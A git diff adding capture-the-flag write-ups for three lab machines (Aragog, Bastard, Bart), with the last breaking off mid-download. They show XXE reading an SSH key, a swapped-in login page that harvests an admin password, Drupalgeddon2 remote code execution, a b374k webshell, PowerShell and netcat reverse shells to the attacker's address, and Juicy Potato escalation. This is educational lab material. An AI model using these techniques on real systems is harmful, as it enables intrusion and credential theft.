+Here we can see the progress graph :
+
+
+
diff --git a/Medium/19.md b/Medium/19.md
new file mode 100644
index 0000000..32a665d
--- /dev/null
+++ b/Medium/19.md
@@ -0,0 +1,326 @@
+# Aragog Writeup
+
+
+
+## Introduction :
+
+Aragog is a Medium linux box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → nmap -F 10.10.10.78 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 13:09 GMT
+ Nmap scan report for 10.10.10.78
+ Host is up (0.092s latency).
+ Not shown: 8317 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 54.94 seconds
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.78
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 13:10 GMT
+ Nmap scan report for 10.10.10.78
+ Host is up (0.090s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.6
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 1
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
+ | 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
+ |_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.37 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 running vsftpd 3.0.3 with anonymous login so let's investigate it:
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~]
+ → ftp 10.10.10.78
+ Connected to 10.10.10.78.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.78:nihilist): anonymous
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ -r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
+ 226 Directory send OK.
+ ftp> get test.txt
+ local: test.txt remote: test.txt
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for test.txt (86 bytes).
+ 226 Transfer complete.
+ 86 bytes received in 0.00 secs (52.6218 kB/s)
+ ftp> exit
+ 221 Goodbye.
+
+
+
+Now that we have downloaded the only textfile allowed to us we print out it's contents :
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → cat test.txt
+ <****details> <****subnet_mask>255.255.255.192 <****/subnet_mask> <****test> <****/test> <****/details>
+
+Looks like we are hinted towards a particular subnet whose mask is /26 so let's move over to enumerating port 80 And for that matter we will be using dirb:
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → dirb http://10.10.10.78/ -X .php
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Fri Mar 13 13:36:52 2020
+ URL_BASE: http://10.10.10.78/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+ EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.78/ ----
+ + http://10.10.10.78/hosts.php (CODE:200|SIZE:46)
+
+ -----------------
+ END_TIME: Fri Mar 13 13:44:07 2020
+ DOWNLOADED: 4612 - FOUND: 1
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → curl -sk http://10.10.10.78/hosts.php
+
+ There are 4294967294 possible hosts for
+
+
+Looking at the results, we seem to have found yet another thing related to subnetting just like that test.txt file we found. so let's catch the request with burpsuite's interceptor and see what we can do from there.
+
+
+
+From there we send the request over to the repeater so that we can modify it to contain the contents of the test.txt file we found on the ftp service earlier.
+
+From there, we change the "GET" method to a "POST" method and add test.txt's file contents :
+
+
+
+And we get a successful response! it looks like this is a subnet calculator, now since we have xml-like content we could assume that we can get some XXE. Let's verify that by sending in an infected payload to read /etc/passwd:
+
+
+
+And we seem to have an username to work with: , so let's try to print out his user flag.
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we have the user flag let's try to get to access onto the system, To do so we'll first try to get the user florian's private ssh key, that is stored in /home/florian/.ssh/id_rsa
+
+
+
+And we have it ! now let's save it locally, give it the necessary permissions and use it to login as the user florian :
+
+
+ λ nihilist [ 10.10.14.6/23 ] [~/_HTB/Aragorg]
+ → ssh -i id_rsa florian@10.10.10.78
+ The authenticity of host '10.10.10.78 (10.10.10.78)' can't be established.
+ ECDSA key fingerprint is SHA256:phu0FjQg/9nCmL2014AJ9yH4akvraA7Ea5QtE59wqD4.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.78' (ECDSA) to the list of known hosts.
+ Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
+
+ florian@aragog:~$ id
+ uid=1000(florian) gid=1000(florian) groups=1000(florian)
+
+ florian@aragog:~$
+
+
+Now since we know that this box has a server running let's see what'sin /var/www/html :
+
+
+ florian@aragog:~$ cd /var/www/html
+ florian@aragog:/var/www/html$ ls
+ dev_wiki hosts.php index.html zz_backup
+ florian@aragog:/var/www/html$ cat hosts.php
+ <****?php
+
+ libxml_disable_entity_loader (false);
+ $xmlfile = file_get_contents('php://input');
+ $dom = new DOMDocument();
+ $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
+ $details = simplexml_import_dom($dom);
+ $mask = $details->subnet_mask;
+ //echo "\r\nYou have provided subnet $mask\r\n";
+
+ $max_bits = '32';
+ $cidr = mask2cidr($mask);
+ $bits = $max_bits - $cidr;
+ $hosts = pow(2,$bits);
+ echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";
+
+ function mask2cidr($mask){
+ $long = ip2long($mask);
+ $base = ip2long('255.255.255.255');
+ return 32-log(($long ^ $base)+1,2);
+ }
+
+ ?****>
+
+Here is the php file we exploited earlier, but in order to escalate privileges we need to take a look into dev_wiki
+
+
+ florian@aragog:/var/www/html$ cd dev_wiki
+ florian@aragog:/var/www/html/dev_wiki$ ls
+ index.php wp-blog-header.php wp-includes wp-settings.php
+ license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
+ readme.html wp-config.php wp-load.php wp-trackback.php
+ wp-activate.php wp-content wp-login.php xmlrpc.php
+ wp-admin wp-cron.php wp-mail.php
+
+
+Now let's see if we can access that wordpress website from the web browser :
+
+
+
+We get a 403 forbidden, but seeing that 10.10.10.78 got changed into aragog, we add the correct line in our /etc/hosts to be able to access the website :
+
+
+
+We see the wordpress website as expected, now let's see what's in the blog directory :
+
+
+
+Apparently the wordpress website files are regularly wiped out, and replaced back automatically, So let's replace wp-login.php with the custom php script that [Magnetik Online](https://github.com/magnetikonline) made:
+
+
+ <****?php
+ // https://gist.github.com/magnetikonline/650e30e485c0f91f2f40
+
+ class DumpHTTPRequestToFile {
+
+ public function execute($targetFile) {
+
+ $data = sprintf(
+ "%s %s %s\n\nHTTP headers:\n",
+ $_SERVER['REQUEST_METHOD'],
+ $_SERVER['REQUEST_URI'],
+ $_SERVER['SERVER_PROTOCOL']
+ );
+
+ foreach ($this->getHeaderList() as $name => $value) {
+ $data .= $name . ': ' . $value . "\n";
+ }
+
+ $data .= "\nRequest body:\n";
+
+ file_put_contents(
+ $targetFile,
+ $data . file_get_contents('php://input') . "\n"
+ );
+
+ echo("Done!\n\n");
+ }
+
+ private function getHeaderList() {
+
+ $headerList = [];
+ foreach ($_SERVER as $name => $value) {
+ if (preg_match('/^HTTP_/',$name)) {
+ // convert HTTP_HEADER_NAME to Header-Name
+ $name = strtr(substr($name,5),'_',' ');
+ $name = ucwords(strtolower($name));
+ $name = strtr($name,' ','-');
+
+ // add to list
+ $headerList[$name] = $value;
+ }
+ }
+
+ return $headerList;
+ }
+ }
+
+
+ (new DumpHTTPRequestToFile)->execute('./dumprequest.txt');
+
+
+ florian@aragog:/var/www/html/dev_wiki$ rm -rf wp-login.php
+ florian@aragog:/var/www/html/dev_wiki$ nano wp-login.php
+
+
+Then wait a bit for the dumprequest.txt file to appear then print out it's contents :
+
+
+ florian@aragog:/var/www/html/dev_wiki$ cat dumprequest.txt
+ POST /dev_wiki/wp-login.php HTTP/1.1
+
+ HTTP headers:
+ Host: 127.0.0.1
+ Connection: keep-alive
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ User-Agent: python-requests/2.18.4
+ Cookie: wordpress_test_cookie=WP Cookie check
+
+ Request body:
+ pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit;=Log+In&testcookie;=1&log;=Administrator&redirect;_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F
+
+
+Now the interesting part here is " %21KRgYs%28JFO%21%26MTr%29lf " which is an URL encoded string that we can paste into burpsuite to decode to get the following string : !KRgYs(JFO!&MTr;)lf
+
+
+ florian@aragog:/var/www/html/dev_wiki$ su
+ Password:
+ shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
+ sh: 0: getcwd() failed: No such file or directory
+
+ root@aragog:/var/www/html/dev_wiki# cat /root/root.txt
+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/2.md b/Medium/2.md
new file mode 100644
index 0000000..de587b4
--- /dev/null
+++ b/Medium/2.md
@@ -0,0 +1,266 @@
+# Bastard Writeup
+
+
+
+## Introduction :
+
+Bastard is a Windows box released back in march 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nmap -F 10.10.10.9
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 14:15 GMT
+ Nmap scan report for 10.10.10.9
+ Host is up (0.11s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 49154/tcp open unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.50 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nmap -sCV -p80,135,49154 10.10.10.9
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 14:15 GMT
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 7.5
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: Welcome to 10.10.10.9 | 10.10.10.9
+ 135/tcp open msrpc Microsoft Windows RPC
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Looks like our nmap scan picked up a drupal 7 service running on port 80, let's run a quick searchsploit command to see the public exploits we could use :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → searchsploit drupal 7.
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | exploits/php/webapps/34992.py
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | exploits/php/webapps/44355.php
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | exploits/php/webapps/34984.py
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | exploits/php/webapps/34993.php
+ Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | exploits/php/webapps/35150.php
+ Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
+ Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
+ Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
+ Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
+ Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | exploits/php/webapps/44557.rb
+ Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | exploits/php/webapps/44542.txt
+ Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex | exploits/php/webapps/44449.rb
+ Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site | exploits/php/webapps/25493.txt
+ Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
+ Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
+ Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | exploits/php/remote/40130.rb
+ Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
+ ----------------------------------------------------------------------------- -------------------------------
+
+
+copying 41564.php locally, we examine it and see that it wants us to browse to the /rest_endpoint.
+
+
+
+But we need to correct this url to /rest in order to get the desired effect :
+
+
+
+After much trial and error, many of the aforementionned php scripts were outdated and unusable, so i switched over to a python script instead :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "whoami"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-F2PmgwKau-sei4wLBRAsbitLPDkYqeRHaKxEw4WeQNo
+ [*] Triggering exploit to execute: whoami
+ nt authority\iusr
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "type C:\Users\dimitris\desktop\user.txt"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-u8rZwB5AUBU3RSzFAvz5PX_RUlfC7iWMA0Om2-K_gXM
+ [*] Triggering exploit to execute: type C:\Users\dimitris\desktop\user.txt
+ baXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have the user flag
+
+## **Part 3 : Getting Root Access**
+
+In order to read the root flag of this machine , we first need to somehow access the machine, first let's run the systeminfo command :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → python3 2018-7600.py http://10.10.10.9/ -c "systeminfo"
+
+ =============================================================================
+ | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
+ | by pimps |
+ =============================================================================
+
+ [*] Poisoning a form and including it in cache.
+ [*] Poisoned form ID: form-l-goUGhqwcUeRLLycex1-gKPluVKCYJEfkgbWBW7XXU
+ [*] Triggering exploit to execute: systeminfo
+
+ Host Name: BASTARD
+ OS Name: Microsoft Windows Server 2008 R2 Datacenter
+ OS Version: 6.1.7600 N/A Build 7600
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00496-001-0001283-84782
+ Original Install Date: 18/3/2017, 7:04:46 ��
+ System Boot Time: 20/2/2020, 4:02:55 ��
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 2 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: el;Greek
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
+ Total Physical Memory: 2.047 MB
+ Available Physical Memory: 1.494 MB
+ Virtual Memory: Max Size: 4.095 MB
+ Virtual Memory: Available: 3.492 MB
+ Virtual Memory: In Use: 603 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: HTB
+ Logon Server: N/A
+ Hotfix(s): N/A
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.9
+
+
+So here are a few more details of the box , let's try a php exploit that our searchsploit command found earlier :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → locate 41564.php
+ /usr/share/exploitdb/exploits/php/webapps/41564.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nano 41564.php
+
+
+
+ #!/usr/bin/php
+ <****?php
+ error_reporting(E_ALL);
+
+ define('QID', 'anything');
+ define('TYPE_PHP', 'application/vnd.php.serialized');
+ define('TYPE_JSON', 'application/json');
+ define('CONTROLLER', 'user');
+ define('ACTION', 'login');
+
+ $myfile = fopen('payload1.txt', 'r');
+ $payload1 = fread($myfile,filesize('payload1.txt'));
+ $url = '10.10.10.9';
+ $endpoint_path = '/rest';
+ $endpoint = 'rest_endpoint'; $file = [
+ 'filename' => 'exp1o1t9r.php',
+ 'data' => $payload1
+ ];
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nano 41564.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → wget -O payload1.txt https://raw.githubusercontent.com/BlackArch/webshells/master/php/b374k-2.7.php
+ --2020-02-20 19:09:26-- https://raw.githubusercontent.com/BlackArch/webshells/master/php/b374k-2.7.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → php 41564.php
+ Stored session information in session.json
+ Stored user information in user.json
+ Cache contains 7 entries
+ File written: 10.10.10.9/exp1o1t9r.php
+
+
+Browse to http://10.10.10.9/exp1o1t9r.php logging in with his credentials : b374k and then browse to the reverse shell tab and select php reverse shell clicking Go once your terminal's netcat command is ready
+
+ _Terminal_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49305
+ b374k shell : connected
+ C:\inetpub\drupal-7.54>whoami
+ nt authority\iusr
+
+ C:\inetpub\drupal-7.54>
+
+
+once we're there, we upload the ms15-051.exe binary through the reverse php shell we just had in order to privesc ,which will send yet another reverse shell but this time as the administrator user :
+
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt.txt
+ type C:\Users\Administrator\Desktop\root.txt.txt
+ 4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we got the root flag :)
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/20.md b/Medium/20.md
new file mode 100644
index 0000000..d91c407
--- /dev/null
+++ b/Medium/20.md
@@ -0,0 +1,350 @@
+# Bart Writeup
+
+
+
+## Introduction :
+
+Bart is a Medium windows box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.3/23 ] [/etc/init.d]
+ → nmap 10.10.10.81 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 23:06 GMT
+ Nmap scan report for 10.10.10.81
+ Host is up (0.20s latency).
+ Not shown: 99 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
+
+ λ nihilist [ 10.10.14.3/23 ] [/etc/init.d]
+ → nmap -sCV -p80 10.10.10.81
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 23:09 GMT
+ Nmap scan report for 10.10.10.81
+ Host is up (0.100s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Did not follow redirect to http://forum.bart.htb/
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.49 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http with a domain name entry forum.bart.htb so let's add it to our /etc/hosts file:
+
+
+ λ root [ 10.10.14.3/23 ] [~]
+ → echo '10.10.10.81 forum.bart.htb bart.htb' >> /etc/hosts
+
+
+` 
+
+And we have access to the webpage ! now let's investigate it a bit further:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://forum.bart.htb | grep wordpress
+ <****a href="http://wordpress.org/">Proudly powered by WordPress <****/a>
+
+Looks like we have a wordpress website to work with, so my initial reflex was to use dirsearch or gobuster to find it's directories although it seems like we can't use neither of the two on forum.bart.htb nor on bart.htb so by interecepting the request in burpsuite we and from the repeater tab, by rendering the page, it seems to return a 200 status code on non-existant directories so we use the appropriate gobuster command :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u bart.htb -s "204,301,302,307,401,403" -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://bart.htb
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/15 14:09:26 Starting gobuster
+ ===============================================================
+ /forum (Status: 301)
+ /monitor (Status: 301)
+ /Forum (Status: 301)
+ /Monitor (Status: 301)
+
+
+It was painfully slow, but gobuster found some interesting results, in particular the /monitor one which is a PHP Server Monitor v3.2.1 login page:
+
+
+
+Next up we navigate to the Forgot Password tab and enter a random username, to get the following error message :
+
+
+
+Now earlier on we found a username "harvey" so let's try it :
+
+
+
+And seems like this username exists! And trying his last name "potter" as the password gives us access to the monitor.bart.htb page so we edit our /etc/hosts file once again:
+
+
+ 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb
+
+
+` 
+
+Next up we navigate over to Status > Internal Chat and we see yet another hostname to add to our /etc/hosts file :
+
+
+
+
+ 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb
+
+
+Navigating over to internal-01.bart.htb we find the following login page:
+
+
+
+Login page onto which the credentials **harry:potter** don't work so let's go and find the [github page](https://github.com/magkopian/php-ajax-simple-chat) for this simple chat and looking at it we should have access to a register.php page so let's check it out using burpsuite:
+
+
+
+Sending it over to the repeater (CTRL+R) and then going to the repeater (CTRL+SHIFT+R) we are able to craft the following request:
+
+
+
+And looking at the response, we seem to get a 302 status code, which seems like we succeeded in registering our account, so let's go ahead and login using the credential we sent nihilist:prometheus.
+
+
+
+And we're in ! Now looking at the page sourcecode, we are hinted towards the log and log_chat php files:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php\?filename\=log.txt\&username;\=harvey
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php\?filename\=log.txt
+ <****br /> <****b>Notice <****/b>: Undefined index: username in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>20 <****/b> <****br />
+ 0%
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php <****br /> <****b>Notice <****/b>: Undefined index: filename in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>19 <****/b> <****br /> <****br /> <****b>Notice <****/b>: Undefined index: username in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>20 <****/b> <****br />
+ 0%
+
+Something's sketchy with this log.php file, it looks like it logs the username, and the user agent of the incoming request. So let's craft a request using burpsuite by changing the User-Agent to try and get remote code execution:
+
+
+
+Now that we added the cmd parameter, let's actually use it to get remote code execution: by changing the filename=log.txt parameter to filename=log.php and by adding our cmd=id :
+
+
+
+And we have code execution ! so now let's try to get a reverse shell using nishang's Invoke-PowerShellTcp.ps1
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → locate Invoke-PowerShellTcp.ps1
+ /home/nihilist/_HTB/Bastard/Invoke-PowerShellTcp.ps1
+ /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9001' >> Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → mv Invoke-PowerShellTcp.ps1 nihilist.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+
+
+
+` 
+
+Now that we have changed our cmd parameter we URL encode it (CTRL+U) and then hit send to get a reverse shell :
+
+
+
+And we have a reverse shell on the box !
+
+## **Part 3 : Getting Root Access**
+
+Now to privesc on this box we'll first check the privileges that are enabled for our user:
+
+
+ PS C:\inetpub\wwwroot\internal-01\simple_chat\includes> whoami /priv
+
+ PRIVILEGES INFORMATION
+ ----------------------
+
+ Privilege Name Description State
+ ======================= ========================================= =======
+ SeChangeNotifyPrivilege Bypass traverse checking Enabled
+ SeImpersonatePrivilege Impersonate a client after authentication Enabled
+ SeCreateGlobalPrivilege Create global objects Enabled
+
+
+
+SetImpersonatePrivilege is enabled so we should be able to get to the SYSTEM privileges using Juicy Potato. Users running the SQL server or IIS usually have these privileges by default. it is designed to allow a service to impersonate other users on the system. Which is why Juicy Potato is of relevance here, because it exploits the way MS handles tokens in order to privesc to SYSTEM. So first let's download the executable locally and then upload it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
+ --2020-03-15 16:23:24-- https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
+ Resolving github.com (github.com)... 140.82.118.4
+ Connecting to github.com (github.com)|140.82.118.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
